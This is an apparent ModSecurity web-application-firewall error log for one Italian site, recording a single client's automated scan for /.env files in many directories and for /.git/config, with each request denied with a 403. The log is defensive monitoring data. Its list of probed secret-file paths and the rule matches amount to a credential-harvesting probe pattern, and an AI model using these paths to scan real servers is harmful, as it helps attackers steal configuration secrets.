[Fri Nov 28 01:41:34.183169 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSjvvuloDCfZueN0CD7L0wAAAAY"]
[Fri Nov 28 01:41:34.185970 2025] [:error] [pid 372560] [client 52.53.201.43:41154] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSjvvlOn1yTodTDZeBuojgAAAAk"]
[Fri Nov 28 01:41:34.186183 2025] [:error] [pid 372560] [client 52.53.201.43:41154] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSjvvlOn1yTodTDZeBuojgAAAAk"]
[Fri Nov 28 01:41:34.186370 2025] [:error] [pid 372560] [client 52.53.201.43:41154] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSjvvlOn1yTodTDZeBuojgAAAAk"]
[Fri Nov 28 01:41:34.191312 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSjvvjPUh6lCNYLkWq7b3wAAAAU"]
[Fri Nov 28 01:41:34.191518 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSjvvjPUh6lCNYLkWq7b3wAAAAU"]
[Fri Nov 28 01:41:34.191721 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSjvvjPUh6lCNYLkWq7b3wAAAAU"]
[Fri Nov 28 01:41:34.444565 2025] [:error] [pid 372573] [client 52.53.201.43:41352] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSjvvuSJzogiRPevWMyAUAAAAAA"]
[Fri Nov 28 01:41:34.444790 2025] [:error] [pid 372573] [client 52.53.201.43:41352] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSjvvuSJzogiRPevWMyAUAAAAAA"]
[Fri Nov 28 01:41:34.444984 2025] [:error] [pid 372573] [client 52.53.201.43:41352] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSjvvuSJzogiRPevWMyAUAAAAAA"]
[Fri Nov 28 01:41:35.075753 2025] [:error] [pid 372779] [client 52.53.201.43:41502] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSjvv9LMlXOJhN7M4XcyCQAAAAQ"]
[Fri Nov 28 01:41:35.075969 2025] [:error] [pid 372779] [client 52.53.201.43:41502] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSjvv9LMlXOJhN7M4XcyCQAAAAQ"]
[Fri Nov 28 01:41:35.076137 2025] [:error] [pid 372779] [client 52.53.201.43:41502] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSjvv9LMlXOJhN7M4XcyCQAAAAQ"]
[Fri Nov 28 01:41:35.591790 2025] [:error] [pid 373908] [client 52.53.201.43:41824] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSjvv-fBRxVgTPpqegC9-QAAAAg"]
[Fri Nov 28 01:41:35.592070 2025] [:error] [pid 373908] [client 52.53.201.43:41824] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSjvv-fBRxVgTPpqegC9-QAAAAg"]
[Fri Nov 28 01:41:35.592277 2025] [:error] [pid 373908] [client 52.53.201.43:41824] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSjvv-fBRxVgTPpqegC9-QAAAAg"]
[Fri Nov 28 01:41:35.595398 2025] [:error] [pid 373907] [client 52.53.201.43:41688] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSjvv5y_tD9P-Q03REf12wAAAAc"]
[Fri Nov 28 01:41:35.595630 2025] [:error] [pid 373907] [client 52.53.201.43:41688] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSjvv5y_tD9P-Q03REf12wAAAAc"]
[Fri Nov 28 01:41:35.595814 2025] [:error] [pid 373907] [client 52.53.201.43:41688] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSjvv5y_tD9P-Q03REf12wAAAAc"]
[Fri Nov 28 01:41:36.536364 2025] [:error] [pid 373909] [client 52.53.201.43:42088] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSjvwHSTSIs8Mr28fc6UzQAAAAo"]
[Fri Nov 28 01:41:36.536639 2025] [:error] [pid 373909] [client 52.53.201.43:42088] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSjvwHSTSIs8Mr28fc6UzQAAAAo"]
[Fri Nov 28 01:41:36.536858 2025] [:error] [pid 373909] [client 52.53.201.43:42088] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSjvwHSTSIs8Mr28fc6UzQAAAAo"]
[Fri Nov 28 01:41:36.732080 2025] [:error] [pid 373910] [client 52.53.201.43:42292] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSjvwCtlj0hOOIH-_WV17AAAAAs"]
[Fri Nov 28 01:41:36.732342 2025] [:error] [pid 373910] [client 52.53.201.43:42292] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSjvwCtlj0hOOIH-_WV17AAAAAs"]
[Fri Nov 28 01:41:36.732535 2025] [:error] [pid 373910] [client 52.53.201.43:42292] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSjvwCtlj0hOOIH-_WV17AAAAAs"]
[Fri Nov 28 01:41:36.969614 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSjvwOloDCfZueN0CD7L1AAAAAY"]
[Fri Nov 28 01:41:36.969833 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSjvwOloDCfZueN0CD7L1AAAAAY"]
[Fri Nov 28 01:41:36.970062 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSjvwOloDCfZueN0CD7L1AAAAAY"]
[Fri Nov 28 01:41:37.185277 2025] [:error] [pid 373911] [client 52.53.201.43:42460] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSjvwbzFtNPvGNLNVA2ufQAAAAw"]
[Fri Nov 28 01:41:37.185552 2025] [:error] [pid 373911] [client 52.53.201.43:42460] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSjvwbzFtNPvGNLNVA2ufQAAAAw"]
[Fri Nov 28 01:41:37.185746 2025] [:error] [pid 373911] [client 52.53.201.43:42460] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSjvwbzFtNPvGNLNVA2ufQAAAAw"]
[Fri Nov 28 01:41:37.623176 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSjvwbwQsF7h-v3vUEEurwAAAAI"]
[Fri Nov 28 01:41:37.623388 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSjvwbwQsF7h-v3vUEEurwAAAAI"]
[Fri Nov 28 01:41:37.623579 2025] [:error] [pid 372609] [client 52.53.201.43:41024] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSjvwbwQsF7h-v3vUEEurwAAAAI"]
[Fri Nov 28 01:41:37.954707 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSjvwTPUh6lCNYLkWq7b4QAAAAU"]
[Fri Nov 28 01:41:37.954935 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSjvwTPUh6lCNYLkWq7b4QAAAAU"]
[Fri Nov 28 01:41:37.955133 2025] [:error] [pid 372780] [client 52.53.201.43:41222] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSjvwTPUh6lCNYLkWq7b4QAAAAU"]
[Fri Nov 28 01:41:38.245114 2025] [:error] [pid 373912] [client 52.53.201.43:42670] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSjvwutygQr4uipfXkUZVAAAAA4"]
[Fri Nov 28 01:41:38.245379 2025] [:error] [pid 373912] [client 52.53.201.43:42670] [client 52.53.201.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSjvwutygQr4uipfXkUZVAAAAA4"]
[Fri Nov 28 01:41:38.245576 2025] [:error] [pid 373912] [client 52.53.201.43:42670] [client 52.53.201.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSjvwutygQr4uipfXkUZVAAAAA4"]
[Fri Nov 28 01:41:39.055023 2025] [:error] [pid 372559] [client 52.53.201.43:41028] [client 52.53.201.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSjvw-loDCfZueN0CD7L1QAAAAY"]
